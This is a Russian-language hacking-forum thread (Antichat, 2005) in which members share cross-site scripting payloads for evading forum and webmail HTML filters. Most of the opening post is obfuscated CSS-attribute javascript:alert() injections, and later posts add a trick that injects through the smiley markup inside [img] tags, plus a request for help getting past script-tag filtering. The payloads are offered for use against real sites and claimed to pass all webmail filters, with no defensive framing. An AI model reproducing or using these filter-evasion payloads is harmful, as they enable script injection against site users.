Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Новый обход фильтров форумов и и-мейлов используя атрибут style |
01.12.2005, 04:30
|
|
Banned
Регистрация: 29.11.2005
Сообщений: 11
Провел на форуме:
42521
Репутация:
-1
|
|
Новый обход фильтров форумов и и-мейлов используя атрибут style
Эти структуры, проверял, работают на ВСЕХ и-мейлах как и на Русских, так и на Английских. Все что нужно, так это разрушить структуру тегов, что не смешите меня, для меня и для знающих, пустяки. На форуме труднее ломать структуру, чем на и-мейлах.
Код HTML:
<html><body><a href=www. style="back\g\r\o\u\nd:\u\r\l\(\javasc\r\i\p\t\:a\le\r\t\(\'\w\j\'\)\)" >wj<a></body></html>
Код HTML:
<html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**/'\w\j\'/**/\/**/)/**/\/**/)" >wj<a></body></html>
Код HTML:
<html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/)" >wj<a></body></html>
without single ( ') quotes.
Код HTML:
<html><body><a href=www. style=/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html>
without single ( ') or double ( ") quotes.
Код HTML:
<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html>
With equals sign. ( =) ( =)
Код HTML:
<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*/'\w\j\'/*=*=/=\=/=*=*/)/*=*=/=\=/=*=*/) >wj<a></body></html>
With equals sign and single quotes. ( =) ( =) ( ')
Код HTML:
<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*=/='=\=w=\=j=\='=/=*=*=/=\=/=*=*/)/*=*=/=\==/=*=*/) >wj<a></body></html>
With equals sign and single quotes, but text inside the alert box, omitted. ( =) ( =) ( ')
Просто интересно, что случается в этой комбинации для знающих. Легче всего просматривать в Фаерфоксе.
Код HTML:
<html><img src="blah.gif" <onchange="alert('you cli=cked me')"></body></html>
и
Код HTML:
<html><img src="blah.gif" <onchange="alert('you clicked me')"></body></html>
Вообщем не один фильтр, эти комбинации не палит, и можете это все проверить на locahost.
Все это проверялось, и все это вы можете проверить и сами, открыв блокнот, copy/paste одну из комбинаций моих кодов как и есть, и сохранить как filename.html
Работает только в браузере ИЕ.
А вот и моя коронка......
Код HTML:
<html><img src="blah.gif" <span style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*/'\w\j\'/*=*=/=\=/=*=*/)/*=*=/=\=/=*=*/) me')"
<img src="blah.gif" <onchange="alert('you cli=cked me')">></body></html>
Последний раз редактировалось SladerNon; 01.12.2005 в 18:32..
Причина: Ролик убрал на mail.yahoo.com
|
|
|
01.12.2005, 04:57
|
|
Banned
Регистрация: 11.09.2005
Сообщений: 254
Провел на форуме:
1002567
Репутация:
-12
|
|
wj есть то что в чем ты еще нечего ненашол ну или неписал просто ето FUDforum новый естественно
-----------------------------------------------------
з.ы. еще пару статей и будет готов твои психологический портрет!-)
|
|
|
|
01.12.2005, 06:31
|
|
Banned
Регистрация: 29.11.2005
Сообщений: 11
Провел на форуме:
42521
Репутация:
-1
|
|
Сообщение от africanec
wj есть то что в чем ты еще нечего ненашол ну или неписал просто ето FUDforum новый естественно
-----------------------------------------------------
Ладно, ты прав...так уж и быть имхо.
Должен сказать, что проверив почти все комбинации тегов, Я нашёл, что они ОЧЕНЬ сильно защищены имхо....ни в одном теги не проходит другой тег, и ни во едином теги не проходит двойная кавычка.
Но вот в чём фишка....во ВСЕХ тегах, проходит смайлик....
Что ну и что? А то, что вы сами теперь можете создавать свой смайлик и ломать через него...это типа, для выкрутасывания... +)
Ну а вот и сам код алёрта,
Код HTML:
[img]java script:alert().gif[/img]
В теге, использована табуляция....как её создать? Открываем блокнот, и жмём кнопочку
Через код который Я вам дал, можно создать свой смайлик и ломать через него....хотя Я пока сам не пробовал, так как это просто идея такая пришла когда засыпал и нужды толком так и не было к этому методу прибегать.
И ещё, во всех тегах проходят одинарная кавычка, ( '), и апостроф ( `), так что создать свой смаилик и через него ломать через любой тег, проблем существовать не должно.
Не забудьте, что смайлик работать не будет, если до смайлика и после, не будет стоять точка. ( .)
Пример,
Код HTML:
[img]http://www.wj.8).gif[/img]
Результат,
Код HTML:
<img src="http://www.wj.<img src="images/smiley_icons/icon_cool.gif" border=0 alt="Cool">.gif" border=0 alt="http://www.wj.<img src="images/smiley_icons/icon_cool.gif" border=0 alt="Cool">.gif">
Код тестился на форуме разработчиков форума, в версии ИЕ6.
Последний раз редактировалось Егорыч+++; 01.12.2005 в 14:08..
|
|
|
|
01.12.2005, 07:16
|
|
Banned
Регистрация: 11.09.2005
Сообщений: 254
Провел на форуме:
1002567
Репутация:
-12
|
|
не я чото помню часика 2 тоже сморел чото вышло кривое непомню уже теперь на старой версии
ну со смайликами чото уж сильно замученно
--з.ы.--
зато я знаю где ты ненайдешь нечего
такой вот супер пупер мега куль форум-)
|
|
|
|
01.12.2005, 07:17
|
|
Постоянный
Регистрация: 03.04.2005
Сообщений: 610
Провел на форуме:
3238231
Репутация:
165
|
|
а ты токв форумах уязвимости ищешь чтоли?
|
|
|
|
01.12.2005, 07:41
|
|
Познающий
Регистрация: 15.05.2005
Сообщений: 58
Провел на форуме:
531678
Репутация:
1
|
|
|
|
|
|
01.12.2005, 13:29
|
|
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415
Репутация:
1398
|
|
wj молодец за видео мне понравилось зилиные мибиры как всегда не одобрят забанят тебя скоро!
|
|
|
|
02.12.2005, 01:17
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355
Репутация:
241
|
|
Джоран, респект! Довольно интересные наработки, осталось тока проверить.
|
|
|
|
02.12.2005, 04:02
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132
Репутация:
116
|
|
Полезный человек этот Джордан.
Хоть и вредный...  |
|
|
|
21.12.2007, 14:33
|
|
Новичок
Регистрация: 11.11.2007
Сообщений: 5
Провел на форуме:
55344
Репутация:
0
|
|
парни такая проблема вот ввожу я
Код HTML:
<script>alert()</script>
в хтмл пишет
Код HTML:
<script>alert()</script>
значит он фильтрует > и добавляет после них ; как мне это обойти помогите плиз незнаю куда обратится просто . |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для Stream[kz]](/avatars/avatar44690.gif){kind=avatar}
Линейный вид
